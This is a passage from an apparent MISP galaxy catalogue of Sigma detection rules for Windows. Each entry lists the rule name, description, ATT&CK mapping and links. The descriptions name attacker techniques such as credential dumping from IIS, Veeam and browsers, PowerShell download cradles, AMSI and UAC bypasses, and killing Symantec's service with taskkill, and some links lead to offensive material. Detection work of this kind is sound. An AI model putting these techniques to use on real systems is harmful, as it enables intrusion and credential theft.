Suspicious Child Process of AspNetCompiler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10901. Table References

Links

https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml

Microsoft IIS Service Account Password Dumped

Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords

The tag is: misp-galaxy:sigma-rules="Microsoft IIS Service Account Password Dumped"

Microsoft IIS Service Account Password Dumped has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 10902. Table References

Links

https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html

https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA

https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml

System File Execution Location Anomaly

Detects a Windows program executable started from a suspicious folder

The tag is: misp-galaxy:sigma-rules="System File Execution Location Anomaly"

System File Execution Location Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10903. Table References

Links

https://twitter.com/GelosSnake/status/934900723426439170

https://asec.ahnlab.com/en/39828/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml

PowerShell Download and Execution Cradles

Detects PowerShell download and execution cradles.

The tag is: misp-galaxy:sigma-rules="PowerShell Download and Execution Cradles"

PowerShell Download and Execution Cradles has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10904. Table References

Links

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml

Arbitrary File Download Via GfxDownloadWrapper.EXE

Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via GfxDownloadWrapper.EXE"

Arbitrary File Download Via GfxDownloadWrapper.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10905. Table References

Links

https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml

UAC Bypass Using MSConfig Token Modification - Process

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using MSConfig Token Modification - Process"

UAC Bypass Using MSConfig Token Modification - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10906. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml

Service Reconnaissance Via Wmic.EXE

An adversary might use WMI to check if a certain remote service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable

The tag is: misp-galaxy:sigma-rules="Service Reconnaissance Via Wmic.EXE"

Service Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10907. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml

Sysmon Configuration Update

Detects updates to Sysmon’s configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely

The tag is: misp-galaxy:sigma-rules="Sysmon Configuration Update"

Sysmon Configuration Update has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10908. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml

Script Interpreter Execution From Suspicious Folder

Detects a suspicious script execution in temporary folders or folders accessible by environment variables

The tag is: misp-galaxy:sigma-rules="Script Interpreter Execution From Suspicious Folder"

Script Interpreter Execution From Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10909. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/shell/csidl

https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml

Insecure Transfer Via Curl.EXE

Detects execution of "curl.exe" with the "--insecure" flag.

The tag is: misp-galaxy:sigma-rules="Insecure Transfer Via Curl.EXE"

Table 10910. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_insecure_connection.yml

Remote Code Execute via Winrm.vbs

Detects an attempt to execute code or create service on remote host via winrm.vbs.

The tag is: misp-galaxy:sigma-rules="Remote Code Execute via Winrm.vbs"

Remote Code Execute via Winrm.vbs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10911. Table References

Links

https://twitter.com/bohops/status/994405551751815170

https://redcanary.com/blog/lateral-movement-winrm-wmi/

https://lolbas-project.github.io/lolbas/Scripts/Winrm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml

Potential PowerShell Obfuscation Via Reversed Commands

Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Via Reversed Commands"

Potential PowerShell Obfuscation Via Reversed Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10913. Table References

Links

https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml

Suspicious Manipulation Of Default Accounts Via Net.EXE

Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password…​etc

The tag is: misp-galaxy:sigma-rules="Suspicious Manipulation Of Default Accounts Via Net.EXE"

Suspicious Manipulation Of Default Accounts Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10914. Table References

Links

https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html

https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml

Process Creation Using Sysnative Folder

Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)

The tag is: misp-galaxy:sigma-rules="Process Creation Using Sysnative Folder"

Process Creation Using Sysnative Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10915. Table References

Links

https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysnative.yml

Arbitrary File Download Via MSEDGE_PROXY.EXE

Detects usage of "msedge_proxy.exe" to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via MSEDGE_PROXY.EXE"

Arbitrary File Download Via MSEDGE_PROXY.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10916. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_proxy_download.yml

PUA - Crassus Execution

Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.

The tag is: misp-galaxy:sigma-rules="PUA - Crassus Execution"

PUA - Crassus Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001" with estimative-language:likelihood-probability="almost-certain"

Table 10917. Table References

Links

https://github.com/vu-ls/Crassus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_crassus.yml

Add New Download Source To Winget

Detects usage of winget to add new additional download sources

The tag is: misp-galaxy:sigma-rules="Add New Download Source To Winget"

Add New Download Source To Winget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10918. Table References

Links

https://learn.microsoft.com/en-us/windows/package-manager/winget/source

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml

Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine

The tag is: misp-galaxy:sigma-rules="Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS"

Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 10919. Table References

Links

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gather_network_info_execution.yml

Suspicious PowerShell Parent Process

Detects a suspicious or uncommon parent processes of PowerShell

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Parent Process"

Suspicious PowerShell Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10920. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml

HackTool - SecurityXploded Execution

Detects the execution of SecurityXploded Tools

The tag is: misp-galaxy:sigma-rules="HackTool - SecurityXploded Execution"

HackTool - SecurityXploded Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 10921. Table References

Links

https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/

https://securityxploded.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_secutyxploded.yml

RDP Connection Allowed Via Netsh.EXE

Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware

The tag is: misp-galaxy:sigma-rules="RDP Connection Allowed Via Netsh.EXE"

RDP Connection Allowed Via Netsh.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 10922. Table References

Links

https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml

HackTool - SysmonEOP Execution

Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120

The tag is: misp-galaxy:sigma-rules="HackTool - SysmonEOP Execution"

HackTool - SysmonEOP Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 10923. Table References

Links

https://github.com/Wh04m1001/SysmonEoP

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml

HackTool - SharpLdapWhoami Execution

Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller

The tag is: misp-galaxy:sigma-rules="HackTool - SharpLdapWhoami Execution"

HackTool - SharpLdapWhoami Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10924. Table References

Links

https://github.com/bugch3ck/SharpLdapWhoami

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml

Imports Registry Key From a File

Detects the import of the specified file to the registry with regedit.exe.

The tag is: misp-galaxy:sigma-rules="Imports Registry Key From a File"

Imports Registry Key From a File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10926. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml

Potential AMSI Bypass Using NULL Bits

Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities

The tag is: misp-galaxy:sigma-rules="Potential AMSI Bypass Using NULL Bits"

Potential AMSI Bypass Using NULL Bits has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10927. Table References

Links

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml

Suspicious Scheduled Task Creation Involving Temp Folder

Detects the creation of scheduled tasks that involves a temporary folder and runs only once

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Creation Involving Temp Folder"

Suspicious Scheduled Task Creation Involving Temp Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10928. Table References

Links

https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml

VeeamBackup Database Credentials Dump Via Sqlcmd.EXE

Detects dump of credentials in VeeamBackup dbo

The tag is: misp-galaxy:sigma-rules="VeeamBackup Database Credentials Dump Via Sqlcmd.EXE"

VeeamBackup Database Credentials Dump Via Sqlcmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 10929. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml

PUA - Process Hacker Execution

Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.

The tag is: misp-galaxy:sigma-rules="PUA - Process Hacker Execution"

PUA - Process Hacker Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Debugger Evasion - T1622" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 10930. Table References

Links

https://processhacker.sourceforge.io/

https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml

Rundll32 Registered COM Objects

load malicious registered COM objects

The tag is: misp-galaxy:sigma-rules="Rundll32 Registered COM Objects"

Rundll32 Registered COM Objects has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 10931. Table References

Links

https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml

Writing Of Malicious Files To The Fonts Folder

Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn’t require admin privillege to be written and executed from.

The tag is: misp-galaxy:sigma-rules="Writing Of Malicious Files To The Fonts Folder"

Writing Of Malicious Files To The Fonts Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10932. Table References

Links

https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml

Potential Browser Data Stealing

Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.

The tag is: misp-galaxy:sigma-rules="Potential Browser Data Stealing"

Potential Browser Data Stealing has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 10933. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml

Renamed NetSupport RAT Execution

Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings

The tag is: misp-galaxy:sigma-rules="Renamed NetSupport RAT Execution"

Table 10934. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml

Potential MsiExec Masquerading

Detects the execution of msiexec.exe from an uncommon directory

The tag is: misp-galaxy:sigma-rules="Potential MsiExec Masquerading"

Potential MsiExec Masquerading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 10935. Table References

Links

https://twitter.com/200_okay_/status/1194765831911215104

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml

Suspicious Outlook Child Process

Detects a suspicious process spawning from an Outlook process.

The tag is: misp-galaxy:sigma-rules="Suspicious Outlook Child Process"

Suspicious Outlook Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 10936. Table References

Links

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html

https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml

Copy From VolumeShadowCopy Via Cmd.EXE

Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)

The tag is: misp-galaxy:sigma-rules="Copy From VolumeShadowCopy Via Cmd.EXE"

Copy From VolumeShadowCopy Via Cmd.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 10937. Table References

Links

https://twitter.com/vxunderground/status/1423336151860002816?s=20

https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml

Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.

The tag is: misp-galaxy:sigma-rules="Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp"

Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10938. Table References

Links

https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication

https://github.com/grayhatkiller/SharpExShell

https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml

Suspicious Msiexec Execute Arbitrary DLL

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)

The tag is: misp-galaxy:sigma-rules="Suspicious Msiexec Execute Arbitrary DLL"

Suspicious Msiexec Execute Arbitrary DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 10939. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://twitter.com/st0pp3r/status/1583914515996897281

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml

Potential MSTSC Shadowing Activity

Detects RDP session hijacking by using MSTSC shadowing

The tag is: misp-galaxy:sigma-rules="Potential MSTSC Shadowing Activity"

Potential MSTSC Shadowing Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002" with estimative-language:likelihood-probability="almost-certain"

Table 10940. Table References

Links

https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet

https://twitter.com/kmkz_security/status/1220694202301976576

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml

Wusa.EXE Executed By Parent Process Located In Suspicious Location

Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.

The tag is: misp-galaxy:sigma-rules="Wusa.EXE Executed By Parent Process Located In Suspicious Location"

Table 10941. Table References

Links

https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml

Suspicious Schtasks Schedule Type With High Privileges

Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks Schedule Type With High Privileges"

Suspicious Schtasks Schedule Type With High Privileges has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10942. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml

Taskkill Symantec Endpoint Protection

Detects one of the possible scenarios for disabling Symantec Endpoint Protection. Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism. As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.

The tag is: misp-galaxy:sigma-rules="Taskkill Symantec Endpoint Protection"

Taskkill Symantec Endpoint Protection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10943. Table References

Links

https://www.exploit-db.com/exploits/37525

https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection

https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml

Potential PowerShell Obfuscation Via WCHAR

Detects suspicious encoded character syntax often used for defense evasion

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Via WCHAR"

Potential PowerShell Obfuscation Via WCHAR has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10944. Table References

Links

https://twitter.com/0gtweet/status/1281103918693482496

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml

Invoke-Obfuscation Via Use MSHTA

Detects Obfuscated Powershell via use MSHTA in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA"

Invoke-Obfuscation Via Use MSHTA has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10945. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml

Suspicious NTLM Authentication on the Printer Spooler Service

Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service

The tag is: misp-galaxy:sigma-rules="Suspicious NTLM Authentication on the Printer Spooler Service"

Suspicious NTLM Authentication on the Printer Spooler Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 10946. Table References

Links

https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml

https://twitter.com/med0x2e/status/1520402518685200384

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml

Suspicious Process By Web Server Process

Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation

The tag is: misp-galaxy:sigma-rules="Suspicious Process By Web Server Process"

Suspicious Process By Web Server Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

Table 10948. Table References

Links

https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml

MSExchange Transport Agent Installation

Detects the Installation of a Exchange Transport Agent

